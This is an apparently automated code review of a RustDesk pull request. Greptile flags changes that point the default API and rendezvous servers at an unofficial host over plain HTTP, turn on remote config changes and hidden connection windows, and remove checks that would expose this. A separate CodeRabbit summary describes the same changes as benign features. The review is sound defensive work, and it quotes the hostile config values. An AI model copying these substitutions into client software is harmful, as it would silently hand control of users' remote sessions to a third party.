srcset="https://greptile-static-assets.s3.amazonaws.com/badges/FixInCodexDark.svg?v=6"><source media="(prefers-color-scheme: light)" srcset="https://greptile-static-assets.s3.amazonaws.com/badges/FixInCodex.svg?v=6"><img alt="Fix in Codex" src="https://greptile-static-assets.s3.amazonaws.com/badges/FixInCodex.svg?v=6"></picture></a>

</details>

<!-- /greptile_failed_comments -->

<a href="https://app.greptile.com/ide/claude-code?prompt=%23%23%23%20Issue%201%0Asrc%2Fcommon.rs%3A1084%0A**Unauthorized%20third-party%20API%20server%20substitution**%0A%0AThe%20default%20API%20server%20is%20replaced%20from%20the%20official%20%60https%3A%2F%2Fadmin.rustdesk.com%60%20to%20%60http%3A%2F%2Frustdesk.ykpt.cc%3A21114%60.%20This%20redirects%20all%20API%20traffic%20%28authentication%2C%20configuration%2C%20remote%20commands%29%20to%20an%20uncontrolled%20third-party%20endpoint%20over%20plain%20HTTP%2C%20exposing%20all%20communication%20to%20interception.%20There%20is%20no%20affiliation%20between%20%60rustdesk.ykpt.cc%60%20and%20the%20official%20RustDesk%20project.%20Every%20client%20built%20from%20this%20branch%20would%20silently%20phone%20home%20to%20this%20server.%0A%0A%23%23%23%20Issue%202%0Alibs%2Fhbb_common%2Fsrc%2Fconfig.rs%3A1%0A**Official%20submodule%20replaced%20with%20a%20modified%20version%20pointing%20to%20attacker-controlled%20server**%0A%0AThe%20official%20%60libs%2Fhbb_common%60%20git%20submodule%20%28previously%20tracking%20%60https%3A%2F%2Fgithub.com%2Frustdesk%2Fhbb_common%60%29%20has%20been%20removed%20and%20replaced%20with%20an%20inlined%20copy%20that%20hard-codes%20%60RENDEZVOUS_SERVERS%3A%20%26%5B%26str%5D%20%3D%20%26%5B%22rustdesk.ykpt.cc%22%5D%60.%20The%20rendezvous%20server%20is%20the%20broker%20that%20facilitates%20every%20remote%20desktop%20connection%3B%20by%20substituting%20it%2C%20all%20peer-discovery%20traffic%20is%20redirected%20to%20an%20uncontrolled%20third-party%20host.%20This%20is%20a%20core%20infrastructure%20replacement%20that%20would%20affect%20every%20user%20of%20any%20build%20produced%20from%20this%20codebase.%0A%0A%23%23%23%20Issue%203%0Asrc%2Fcommon.rs%3A2086-2134%0A**Remote%20configuration%20modification%20silently%20enabled%20by%20default**%0A%0A%60OPTION_ALLOW_REMOTE_CONFIG_MODIFICATION%60%20and%20%60allow-hide-cm%60%20are%20injected%20into%20%60DEFAULT_SETTINGS%60%20with%20value%20%60%22Y%22%60%20for%20all%20code%20paths%20%28both%20the%20debug%20%60custom.txt%60%20branch%20and%20the%20main%20production%20path%29.%20Combined%20with%20the%20API%20and%20rendezvous%20servers%20now%20pointing%20to%20%60rustdesk.ykpt.cc%60%2C%20this%20grants%20the%20operator%20of%20that%20server%20the%20ability%20to%20push%20arbitrary%20configuration%20changes%20to%20every%20connected%20client%2C%20and%20to%20suppress%20the%20connection-management%20window%20that%20would%20make%20those%20connections%20visible%20to%20the%20local%20user.%0A%0A%23%23%23%20Issue%204%0Aflutter%2Flib%2Fdesktop%2Fpages%2Fconnection_page.dart%3A78-99%0A**%22Use%20your%20own%20server%22%20prompt%20deliberately%20removed**%0A%0AThe%20%60setupServerWidget%60%20previously%20rendered%20a%20clickable%20link%20%28%60setup_server_tip%60%29%20that%20encouraged%20users%20connecting%20via%20the%20public%20server%20to%20consider%20running%20their%20own.%20This%20change%20empties%20its%20%60children%60%20list%2C%20silently%20hiding%20the%20prompt.%20Because%20the%20API%20and%20rendezvous%20servers%20are%20now%20%60rustdesk.ykpt.cc%60%2C%20this%20removal%20also%20suppresses%20the%20one%20UI%20element%20that%20would%20signal%20to%20a%20user%20that%20a%20non-official%20server%20is%20being%20used.%0A%0A%23%23%23%20Issue%205%0A.github%2Fworkflows%2Fci.yml%3A107-113%0A**Submodule%20checkout%20removed%20from%20CI%20across%20all%20workflows**%0A%0A%60submodules%3A%20recursive%60%20is%20removed%20from%20the%20%60ci.yml%60%2C%20%60bridge.yml%60%2C%20%60flutter-build.yml%60%2C%20and%20%60playground.yml%60%20checkout%20steps.%20Because%20%60libs%2Fhbb_common%60%20is%20now%20an%20inlined%20directory%20rather%20than%20a%20git%20submodule%2C%20CI%20will%20no%20longer%20pull%20from%20the%20canonical%20%60https%3A%2F%2Fgithub.com%2Frustdesk%2Fhbb_common%60%20repository.%20The%20inlined%20copy%20is%20the%20one%20that%20contains%20the%20modified%20rendezvous%20server%20pointing%20to%20%60rustdesk.ykpt.cc%60.%20This%20change%20is%20necessary%20for%20the%20substitution%20to%20survive%20CI%20without%20being%20overwritten%20by%20the%20legitimate%20submodule%20content.%0A%0A---%0A%0AFor%20each%20issue%20above%2C%20determine%20whether%20it%20is%20valid%20and%20should%20be%20fixed.%20If%20so%2C%20fix%20it%20directly.&repo=rustdesk%2Frustdesk&pr=15715&platform=github"><picture><source media="(prefers-color-scheme: dark)" srcset="https://greptile-static-assets.s3.amazonaws.com/badges/FixAllInClaudeDark.svg?v=6"><source media="(prefers-color-scheme: light)" srcset="https://greptile-static-assets.s3.amazonaws.com/badges/FixAllInClaude.svg?v=6"><img alt="Fix All in Claude Code" src="https://greptile-static-assets.s3.amazonaws.com/badges/FixAllInClaude.svg?v=6"></picture></a> <a href="https://app.greptile.com/api/ide/codex?prompt=IMPORTANT%3A%20Work%20in%20the%20repository%20%22rustdesk%2Frustdesk%22%20on%20the%20existing%20branch%20%22master%22.%20Checkout%20that%20branch%20%E2%80%94%20do%20NOT%20create%20a%20new%20branch%20or%20open%20a%20new%20PR.%20Push%20your%20changes%20to%20%22master%22.%0A%0A%23%23%23%20Issue%201%0Asrc%2Fcommon.rs%3A1084%0A**Unauthorized%20third-party%20API%20server%20substitution**%0A%0AThe%20default%20API%20server%20is%20replaced%20from%20the%20official%20%60https%3A%2F%2Fadmin.rustdesk.com%60%20to%20%60http%3A%2F%2Frustdesk.ykpt.cc%3A21114%60.%20This%20redirects%20all%20API%20traffic%20%28authentication%2C%20configuration%2C%20remote%20commands%29%20to%20an%20uncontrolled%20third-party%20endpoint%20over%20plain%20HTTP%2C%20exposing%20all%20communication%20to%20interception.%20There%20is%20no%20affiliation%20between%20%60rustdesk.ykpt.cc%60%20and%20the%20official%20RustDesk%20project.%20Every%20client%20built%20from%20this%20branch%20would%20silently%20phone%20home%20to%20this%20server.%0A%0A%23%23%23%20Issue%202%0Alibs%2Fhbb_common%2Fsrc%2Fconfig.rs%3A1%0A**Official%20submodule%20replaced%20with%20a%20modified%20version%20pointing%20to%20attacker-controlled%20server**%0A%0AThe%20official%20%60libs%2Fhbb_common%60%20git%20submodule%20%28previously%20tracking%20%60https%3A%2F%2Fgithub.com%2Frustdesk%2Fhbb_common%60%29%20has%20been%20removed%20and%20replaced%20with%20an%20inlined%20copy%20that%20hard-codes%20%60RENDEZVOUS_SERVERS%3A%20%26%5B%26str%5D%20%3D%20%26%5B%22rustdesk.ykpt.cc%22%5D%60.%20The%20rendezvous%20server%20is%20the%20broker%20that%20facilitates%20every%20remote%20desktop%20connection%3B%20by%20substituting%20it%2C%20all%20peer-discovery%20traffic%20is%20redirected%20to%20an%20uncontrolled%20third-party%20host.%20This%20is%20a%20core%20infrastructure%20replacement%20that%20would%20affect%20every%20user%20of%20any%20build%20produced%20from%20this%20codebase.%0A%0A%23%23%23%20Issue%203%0Asrc%2Fcommon.rs%3A2086-2134%0A**Remote%20configuration%20modification%20silently%20enabled%20by%20default**%0A%0A%60OPTION_ALLOW_REMOTE_CONFIG_MODIFICATION%60%20and%20%60allow-hide-cm%60%20are%20injected%20into%20%60DEFAULT_SETTINGS%60%20with%20value%20%60%22Y%22%60%20for%20all%20code%20paths%20%28both%20the%20debug%20%60custom.txt%60%20branch%20and%20the%20main%20production%20path%29.%20Combined%20with%20the%20API%20and%20rendezvous%20servers%20now%20pointing%20to%20%60rustdesk.ykpt.cc%60%2C%20this%20grants%20the%20operator%20of%20that%20server%20the%20ability%20to%20push%20arbitrary%20configuration%20changes%20to%20every%20connected%20client%2C%20and%20to%20suppress%20the%20connection-management%20window%20that%20would%20make%20those%20connections%20visible%20to%20the%20local%20user.%0A%0A%23%23%23%20Issue%204%0Aflutter%2Flib%2Fdesktop%2Fpages%2Fconnection_page.dart%3A78-99%0A**%22Use%20your%20own%20server%22%20prompt%20deliberately%20removed**%0A%0AThe%20%60setupServerWidget%60%20previously%20rendered%20a%20clickable%20link%20%28%60setup_server_tip%60%29%20that%20encouraged%20users%20connecting%20via%20the%20public%20server%20to%20consider%20running%20their%20own.%20This%20change%20empties%20its%20%60children%60%20list%2C%20silently%20hiding%20the%20prompt.%20Because%20the%20API%20and%20rendezvous%20servers%20are%20now%20%60rustdesk.ykpt.cc%60%2C%20this%20removal%20also%20suppresses%20the%20one%20UI%20element%20that%20would%20signal%20to%20a%20user%20that%20a%20non-official%20server%20is%20being%20used.%0A%0A%23%23%23%20Issue%205%0A.github%2Fworkflows%2Fci.yml%3A107-113%0A**Submodule%20checkout%20removed%20from%20CI%20across%20all%20workflows**%0A%0A%60submodules%3A%20recursive%60%20is%20removed%20from%20the%20%60ci.yml%60%2C%20%60bridge.yml%60%2C%20%60flutter-build.yml%60%2C%20and%20%60playground.yml%60%20checkout%20steps.%20Because%20%60libs%2Fhbb_common%60%20is%20now%20an%20inlined%20directory%20rather%20than%20a%20git%20submodule%2C%20CI%20will%20no%20longer%20pull%20from%20the%20canonical%20%60https%3A%2F%2Fgithub.com%2Frustdesk%2Fhbb_common%60%20repository.%20The%20inlined%20copy%20is%20the%20one%20that%20contains%20the%20modified%20rendezvous%20server%20pointing%20to%20%60rustdesk.ykpt.cc%60.%20This%20change%20is%20necessary%20for%20the%20substitution%20to%20survive%20CI%20without%20being%20overwritten%20by%20the%20legitimate%20submodule%20content.%0A%0A---%0A%0AFor%20each%20issue%20above%2C%20determine%20whether%20it%20is%20valid%20and%20should%20be%20fixed.%20If%20so%2C%20fix%20it%20directly.&repo=rustdesk%2Frustdesk&pr=15715&platform=github"><picture><source media="(prefers-color-scheme: dark)" srcset="https://greptile-static-assets.s3.amazonaws.com/badges/FixAllInCodexDark.svg?v=6"><source media="(prefers-color-scheme: light)" srcset="https://greptile-static-assets.s3.amazonaws.com/badges/FixAllInCodex.svg?v=6"><img alt="Fix All in Codex" src="https://greptile-static-assets.s3.amazonaws.com/badges/FixAllInCodex.svg?v=6"></picture></a>

<details><summary>Prompt To Fix All With AI</summary>

`````markdown
### Issue 1
src/common.rs:1084
**Unauthorized third-party API server substitution**

The default API server is replaced from the official `https://admin.rustdesk.com` to `http://rustdesk.ykpt.cc:21114`. This redirects all API traffic (authentication, configuration, remote commands) to an uncontrolled third-party endpoint over plain HTTP, exposing all communication to interception. There is no affiliation between `rustdesk.ykpt.cc` and the official RustDesk project. Every client built from this branch would silently phone home to this server.

### Issue 2
libs/hbb_common/src/config.rs:1
**Official submodule replaced with a modified version pointing to attacker-controlled server**

The official `libs/hbb_common` git submodule (previously tracking `https://github.com/rustdesk/hbb_common`) has been removed and replaced with an inlined copy that hard-codes `RENDEZVOUS_SERVERS: &[&str] = &["rustdesk.ykpt.cc"]`. The rendezvous server is the broker that facilitates every remote desktop connection; by substituting it, all peer-discovery traffic is redirected to an uncontrolled third-party host. This is a core infrastructure replacement that would affect every user of any build produced from this codebase.

### Issue 3
src/common.rs:2086-2134
**Remote configuration modification silently enabled by default**

`OPTION_ALLOW_REMOTE_CONFIG_MODIFICATION` and `allow-hide-cm` are injected into `DEFAULT_SETTINGS` with value `"Y"` for all code paths (both the debug `custom.txt` branch and the main production path). Combined with the API and rendezvous servers now pointing to `rustdesk.ykpt.cc`, this grants the operator of that server the ability to push arbitrary configuration changes to every connected client, and to suppress the connection-management window that would make those connections visible to the local user.

### Issue 4
flutter/lib/desktop/pages/connection_page.dart:78-99
**"Use your own server" prompt deliberately removed**

The `setupServerWidget` previously rendered a clickable link (`setup_server_tip`) that encouraged users connecting via the public server to consider running their own. This change empties its `children` list, silently hiding the prompt. Because the API and rendezvous servers are now `rustdesk.ykpt.cc`, this removal also suppresses the one UI element that would signal to a user that a non-official server is being used.

### Issue 5
.github/workflows/ci.yml:107-113
**Submodule checkout removed from CI across all workflows**

`submodules: recursive` is removed from the `ci.yml`, `bridge.yml`, `flutter-build.yml`, and `playground.yml` checkout steps. Because `libs/hbb_common` is now an inlined directory rather than a git submodule, CI will no longer pull from the canonical `https://github.com/rustdesk/hbb_common` repository. The inlined copy is the one that contains the modified rendezvous server pointing to `rustdesk.ykpt.cc`. This change is necessary for the substitution to survive CI without being overwritten by the legitimate submodule content.

---

For each issue above, determine whether it is valid and should be fixed. If so, fix it directly.
`````

</details>

<sub>Reviews (1): Last reviewed commit: ["Update config.rs"](https://github.com/rustdesk/rustdesk/commit/bc14eb677d75ae68fec7fa7ddac1454c4233e0ec) | [Re-trigger Greptile](https://app.greptile.com/api/retrigger?id=48547146)</sub>

> Greptile also left **3 inline comments** on this PR.

<!-- /greptile_comment -->

<!-- This is an auto-generated comment: release notes by coderabbit.ai -->

## Summary by CodeRabbit

- **New Features**
  - Added expanded cross-platform build and release support for Windows, macOS, iOS, Android, Linux, and Flatpak.
  - Added support for WebRTC connectivity, proxy connections, WebSockets, and improved network transport.
  - Added foundational support for file transfers, compression, secure configuration, and device fingerprinting.

- **Bug Fixes**
  - Restored the password visibility control in Security settings.
  - Removed the obsolete public-server setup guide from the connection status display.

- **Configuration**
  - Custom client settings now enable remote configuration changes and connection-window hiding by default.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->